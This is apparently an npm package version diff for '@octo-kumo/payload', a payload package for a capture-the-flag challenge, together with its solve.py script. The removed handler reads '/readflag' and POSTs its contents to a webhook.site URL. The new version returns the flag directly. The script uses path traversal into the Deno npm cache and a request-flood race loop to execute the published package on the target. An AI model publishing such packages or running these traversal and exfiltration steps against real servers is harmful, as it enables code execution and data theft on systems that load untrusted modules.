@octo-kumo/payload 1.0.9 → 1.0.11

Sign up to get free protection for your applications and to get access to all the features.
Files changed (3) hide show
  1. package/package.json +1 -1
  2. package/payload.tsx +2 -11
  3. package/solve.py +4 -4
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@octo-kumo/payload",
3
- "version": "1.0.9",
3
+ "version": "1.0.11",
4
4
  "description": "payload for ctf challenge [70000 too much]",
5
5
  "main": "index.js",
6
6
  "scripts": {
package/payload.tsx CHANGED
@@ -1,13 +1,4 @@
1
1
  import * as fs from 'fs'
2
- import { Context } from 'hono'
3
- export const handler = async (c: Context) => {
4
- fetch("https://webhook.site/edba7673-e348-4f1e-ad83-9d051fce1229", {
5
- method: "POST",
6
- body: "yo!"
7
- })
8
- await fetch("https://webhook.site/edba7673-e348-4f1e-ad83-9d051fce1229", {
9
- method: "POST",
10
- body: fs.readFileSync("/readflag")
11
- })
12
- return c.html("haha hacked!")
2
+ export const handler = async (c) => {
3
+ return c.text(fs.readFileSync("/readflag"))
13
4
  }
package/solve.py CHANGED
@@ -3,20 +3,20 @@ import time
3
3
  import requests
4
4
 
5
5
 
6
- target = 'http://localhost:9644'
7
- p = '/../../../deno-dir/npm/registry.npmjs.org/@octo-kumo/payload/1.0.8/payload'
6
+ target = 'http://localhost:12031'
7
+ p = '/../../../deno-dir/npm/registry.npmjs.org/@octo-kumo/payload/1.0.10/payload'
8
8
  preload = target + '/query?package=%40octo-kumo%2Fpayload'
9
9
  activate = target + p
10
10
 
11
11
  subprocess.Popen(["curl", preload])
12
12
  s = requests.Session()
13
- for i in range(200):
13
+ for i in range(10000):
14
14
  r = requests.Request(method='GET', url=activate)
15
15
  prep = r.prepare()
16
16
  prep.url = activate
17
17
  response = s.send(prep)
18
18
  t = response.text
19
- if '404 Not Found' not in t:
19
+ if "No such file or director" not in t:
20
20
  print(t)
21
21
  time.sleep(0.01)
22
22
  # cat > /deno-dir/npm/registry.npmjs.org/@octo-kumo/payload/1.0.6/payload.tsx